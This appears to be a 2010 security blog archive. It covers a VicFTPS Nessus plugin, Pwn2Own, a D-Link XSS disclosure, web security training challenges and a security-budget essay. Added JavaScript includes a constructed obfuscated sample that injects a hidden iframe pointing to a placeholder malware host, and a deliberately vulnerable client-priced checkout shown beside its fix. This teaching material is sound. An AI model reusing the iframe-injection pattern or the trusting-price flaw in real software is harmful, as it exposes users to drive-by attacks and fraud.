Monday, May 31, 2010

Nessus Plugin for VicFTPS Vulnerability

I wrote a Nessus plugin to test for the VicFTPS Directory Traversal Vulnerability, which was discovered by chr1x (a member of our sectester team).

The plugin exploits the directory traversal vulnerability and returns the results if it succeeds. I will be submitting it to Nessus so it can be added to the Plugin Feeds and shared with everyone. You can download the plugin here.

- Test with the NASL interpreter

- Added the plugin

- Result from a scan


References:
- SecurityFocus: VicFTPS Directory Traversal Vulnerability

Wednesday, May 26, 2010

The Pwn2Own 2010 Contest

The Pwn2Own 2010 contest organized by DVLabs is over, but there is some interesting information to share.
(Extract from "10 Lessons From The Pwn2Own Hacker Contest")


Google Chrome the Most Secure?

"The only browser that survived Pwn2Own this year was Google Chrome. This led to numerous news reports like this one suggesting that Google's browser was somehow more secure than the others. This is far from the truth. In fact, the vulnerability that caused the iPhone's downfall was in the WebKit engine and also affected the Google Chrome browser. Chrome's sandbox was also held up as a major CanSecWest roadblock but there's already scuttlebutt circulating that at least two security researchers have found a way to break out of the Chrome sandbox. Keep in mind that the iPhone has a sandbox that didn't help much when hackers hijacked the SMS database at Pwn2Own.

Survival at the Pwn2Own contest simply means that researchers weren't motivated enough to give up their vulnerabilities/exploits in exchange for a smartphone and cash prizes. The iPhone survived in 2008, didn't it?"


IE 8 seems to be the most protected browser.

"Despite the survival of Google Chrome and the fall of Internet Explorer 8 (running on Windows 7), all the browser hackers at the contest maintained that Microsoft's browser is by far the most difficult to exploit. For starters, IE 8 is the only browser to fully -- and properly -- implement ASLR. Peter Vreugdenhil, the researcher behind the successful IE 8 hack, needed two different vulnerabilities and several exploitation tricks to get it to work. However, because IE is the world's most widely deployed browser, it will continue to attract the attention of hackers and malware writers. Security doesn't equate to safety."


Apple Safari still the Easiest to Hack?

"For the third year in a row, security researcher Charlie Miller successfully compromised a fully patched MacBook Pro machine with a Safari vulnerability and exploit. Despite Apple's best efforts at making it difficult to exploit the Mac OS X, Miller's exploits show that Safari is still easy pickings because it lacks the mitigations found in Microsoft Windows. For example, Safari does not implement ASLR properly and does not have a sandbox to limit the damage from a hacker attack."

Wednesday, May 19, 2010

D-Link Router XSS vulnerability found by w01f Labs

I discovered a Cross-Site Scripting (XSS) vulnerability in my own D-Link router while working on fuzzing and vulnerability research last week. The vulnerability allows injection of arbitrary HTML and malicious script code into the user's browser session.

Discovered Date: May 14, 2010
System affected: D-Link DI-724P+ Router, Firmware Version: v1.03

For more details on this vulnerability, visit my research site - w01f Labs

Other References:
- SecurityFocus: D-Link DI-724P+ Router 'wlap.htm' HTML Injection Vulnerability
- OSVDB 65002 : D-Link DI-724P+ Admin Interface wlap.htm GET String XSS
- SANS: @RISK: The Consensus Security Vulnerability Alert

Monday, May 10, 2010

Web Security Challenge Revealed

I created a series of security challenges for my Sectester team several months back, for the team to learn and share knowledge.

The first challenge is on "Script Obfuscation".



Description:
Code obfuscation is commonly used by malware writers to evade anti-virus detection and hinder reverse engineering. Much obfuscated JavaScript has been injected into innocent websites to run exploits and shellcode that compromise the visiting system; other injections use "drive-by download" techniques to fetch further malware.

Objective:
In this challenge, you will learn the basics of analysing a script from a webpage. I have recommended some basic tools (under Technical resources) for beginners to pick up the fundamentals of script analysis. There are many tools and ways to analyse a script; you may find other useful tools on the Internet.

Environment:
The challenge was created with simple HTML and some javascript.
The URL: Email me if you are interested

Rules:
* No particular rules. It is a code challenge: crack the code, not the server.

Technical resources:
http://en.wikipedia.org/wiki/Obfuscated_code
- Some reading on code obfuscation

http://noscript.net/
- A useful tool to stop scripts on a webpage before you start analysing them

http://getfirebug.com/
- A useful tool to inspect and debug scripts running on a webpage

Some real malicious obfuscated JavaScript from my research blog: http://labs-werew01f.sectester.net/

Feel free to provide comments on this challenge.
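The kind of analysis this challenge asks for, as an added example that is not part of the original challenge: a Node.js harness that runs a script with eval and document.write replaced by hooks, so each decoded layer is captured instead of executed. The obfuscated sample is constructed here (built from its own plaintext so you can see what it hides) and the URL in it is a placeholder.

```javascript
// Constructed sample in the style of injected scripts of the period: the real payload is
// hidden as character codes and only exists after eval(). The URL is a placeholder.
const HIDDEN_STAGE = 'document.write(\'<iframe src="http://malware.example.invalid/load.php" width="1" height="1"></iframe>\');';
const SAMPLE_SCRIPT =
  'var c=[' + Array.from(HIDDEN_STAGE, ch => ch.charCodeAt(0)).join(',') + '];' +
  'var s="";for(var i=0;i<c.length;i++){s+=String.fromCharCode(c[i]);}eval(s);';

// Run one layer of script with eval/document/window shadowed by function parameters.
// A sloppy-mode Function body may name a parameter "eval", so the script's eval(...)
// becomes an ordinary call to our hook rather than a direct eval of the payload.
function runHooked(code) {
  const evals = [];
  const writes = [];
  const fakeDocument = {
    write: s => { writes.push(String(s)); },
    writeln: s => { writes.push(String(s)); },
  };
  const hookedEval = s => { evals.push(String(s)); };
  let error = null;
  try {
    new Function('eval', 'document', 'window', code)(hookedEval, fakeDocument, {});
  } catch (e) {
    error = String(e); // scripts often touch browser-only objects; record it and go on
  }
  return { evals, writes, error };
}

// Peel layers until nothing new is passed to eval(), then pull URLs out of what the
// script tried to write into the page. maxDepth bounds scripts that re-eval forever.
function analyzeScript(code, maxDepth = 5) {
  const decoded = []; // every string some layer handed to eval()
  const writes = [];  // every string some layer handed to document.write()
  const errors = [];
  let pending = [code];
  for (let depth = 0; depth < maxDepth && pending.length > 0; depth++) {
    const start = decoded.length;
    for (const layer of pending) {
      const r = runHooked(layer);
      decoded.push(...r.evals);
      writes.push(...r.writes);
      if (r.error) errors.push(r.error);
    }
    pending = decoded.slice(start); // the newly decoded strings are the next layer
  }
  const urls = [...new Set(writes.flatMap(w => w.match(/https?:\/\/[^\s"'<>]+/g) || []))];
  return { decoded, writes, urls, errors };
}
```

Run `analyzeScript(SAMPLE_SCRIPT)` to see the decoded second stage, the injected iframe markup, and the extracted URL without the script ever touching a real DOM.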

Web Security Challenge 2

The Web Security Challenge on "Encoding attacks for Web applications".



Description:
Web applications commonly use the "GET" method to send user requests to the web server, typically for searches, queries and bookmarkable pages. The data in these requests can be easily extracted and manipulated from the address bar.

Objective:
This is a very simple challenge. You are required to extract the "password" from the simulated user login and verify the captured password by logging in with it. You will learn how an application uses the "GET" method to send requests to the server; this is the foundation for further challenges on code injection. You don't really need any tools to complete this challenge.

Environment:
The challenge was created with simple HTML and PHP.
The URL: Email me if you are interested

Rules:
* Do not extract the password from the source code. You are supposed to extract it from the request.
* It is a code challenge: extract the data, don't crack the server.

Technical resources:
http://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol
- Some reading on HTTP and request methods

Feel free to give comments on the challenge.

Web Security Challenge 3

Another challenge on "Encoding attacks for Web applications".



Description:
Many websites do not use SSL encryption for their web applications (including login pages), so data can easily be extracted or manipulated during the communication between the client and the server.

Objective:
This is a simple challenge. You are required to extract the "password" from the simulated user login and verify the captured password by logging in with it. You will learn how to capture web communication between the client and the server; this is the foundation for further challenges on code injection.

Environment:
The challenge was created with simple HTML and PHP.
The URL: Email me if you are interested

Rules:
* Do not extract the password from the source code. You are supposed to extract it from the communication.
* It is a code challenge: extract the data, don't crack the server.

Technical resources:
http://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol
- Some reading on HTTP and request methods

http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
- WebScarab, a good tool from OWASP

http://www.parosproxy.org/
- Another good web security tool

- I previously did a video on extracting a user's credentials from an unsecured website:
http://werew01f.blogspot.com/2009/05/how-secure-is-your-forum-login.html

Feel free to provide comments on this challenge.

Web Security Challenge 4

Web Security Challenge on "Data Manipulation attacks for Web applications".



Description:
Many websites do not use SSL encryption for their web applications (including login pages), so data can easily be extracted or manipulated during the communication between the client and the server. Some web applications do their computation on the client system and submit the result back to the server. One of my first few hacks, many years back, was changing my score in an online game.

Objective:
This is a simple challenge. You are required to change the price of an online shopping item to $2. You will learn to manipulate data sent between the client and the server; this is the foundation for further challenges on code injection.

Environment:
The challenge was created with simple HTML and PHP.
The URL: Email me if you are interested

Rules:
* Do not change the source code. You are supposed to manipulate the data during the communication.
* It is a code challenge: manipulate the data, don't crack the server.

Technical resources:
http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
- WebScarab, a good tool from OWASP

http://www.parosproxy.org/
- Another good web security tool

Feel free to provide comments on this challenge.

Web Security Challenge 5

Web Security Challenge on "XSS attacks for Web applications".



Description:
Many websites these days are prone to XSS (Cross-Site Scripting) attacks. Some web applications use simple XSS filters to protect against them, but there are many ways to bypass those filters.

Objective:
This is a simple XSS challenge. You are required to inject a simple alert that displays "sectester rocks". You will learn to launch an XSS attack and bypass simple XSS filters; this is the foundation for tougher challenges in future.

Environment:
The challenge was created with simple HTML and PHP.
The URL: Email me if you are interested

Rules:
* Do not change the source code. You are supposed to inject the script.
* It is a code challenge: manipulate the data, don't crack the server.

Technical resources:
http://en.wikipedia.org/wiki/Cross-site_scripting
- Basics of Cross-Site Scripting

Feel free to provide comments on this challenge.
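As an added example (not the challenges' own PHP, which is not on this page), the server side of Challenges 4 and 5 written in plain Node.js: the trusting checkout beside a hardened one that prices from its own catalog and logs a mismatching client price as a tampering signal, plus HTML escaping for the confirmation page in place of a tag blacklist. The catalog items and prices are constructed.

```javascript
// Constructed catalog: the authoritative prices live only on the server. A Map rather
// than a plain object, so a lookup of "constructor" or "__proto__" cannot hit the prototype.
const CATALOG = new Map([['book-101', 25.0], ['mug-7', 9.5]]);

// Vulnerable (the Challenge 4 flaw): the total is computed from a price the client sent,
// so whoever edits the request in transit sets their own price.
function checkoutTrusting(query) {
  const qty = Number.parseInt(query.qty, 10);
  const price = Number.parseFloat(query.price); // client-controlled
  return { ok: true, total: price * qty };
}

// Hardened: the client may only name an item and a quantity. The server looks the price
// up itself, validates the quantity, and treats a client-supplied price that disagrees
// with the catalog as tampering worth logging for detection.
function checkoutHardened(query, log = []) {
  const unitPrice = CATALOG.get(query.item);
  const qty = Number.parseInt(query.qty, 10);
  if (unitPrice === undefined || !Number.isInteger(qty) || qty < 1 || qty > 100) {
    return { ok: false, error: 'invalid item or quantity' };
  }
  if (query.price !== undefined && Number(query.price) !== unitPrice) {
    log.push(`price tamper: item=${query.item} sent=${query.price} catalog=${unitPrice}`);
  }
  return { ok: true, total: unitPrice * qty };
}

// Challenge 5 lesson: a blacklist that strips a few tag names can be worked around, while
// escaping every metacharacter of the HTML text context leaves the browser no way to
// read user data as markup.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, c => HTML_ESCAPES[c]);
}

// Confirmation page: every user-controlled value passes through escapeHtml before it is
// placed in the markup.
function confirmationPage(query, result) {
  if (!result.ok) return `<p>Error: ${escapeHtml(result.error)}</p>`;
  return `<p>Order for ${escapeHtml(query.item)}: $${result.total.toFixed(2)}</p>`;
}
```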

Tuesday, May 4, 2010

Most Secure vs. Cost-Effective Security

I had an interesting discussion recently with Krag Brotby (editor of the official ISACA CISM Review Manual) about setting a high baseline and achieving zero incidents. It triggered the thought of "most secure" versus "cost-effective" security.

In security, most practitioners try to set a high baseline to achieve zero incidents, acquiring various security products to protect against all possible threats. Much of the time, standard security controls such as firewalls and anti-virus handle 95% of the incidents with about 20% of the total security expenses, while the more sophisticated products and solutions, such as SIEM, handle the remaining 5% but consume 50% of the total expenses and resources.

Instead of spending so much to handle the minority of threats, they can sometimes be managed by having an incident handling process for that 5% of incidents (which may be 3 to 5 incidents per year). The majority of the budget and resources could be saved or put to better use. It is definitely a good value proposition that appeals to management (especially during an economic downturn).

Having zero incidents may also have a "negative" impact on management and staff. Management may become too comfortable with the security level and may not increase, or may even cut, future budgets. Security staff may also become complacent about maintaining and improving the current security.

As new security issues emerge constantly, your current security controls will never be enough to maintain zero incidents for your organization forever. New threats will be discovered, and additional budget and controls will be needed. Having a few incidents per year can be useful to keep management and security staff on their toes: management may be more accepting of new threats, and staff more responsive to new security challenges.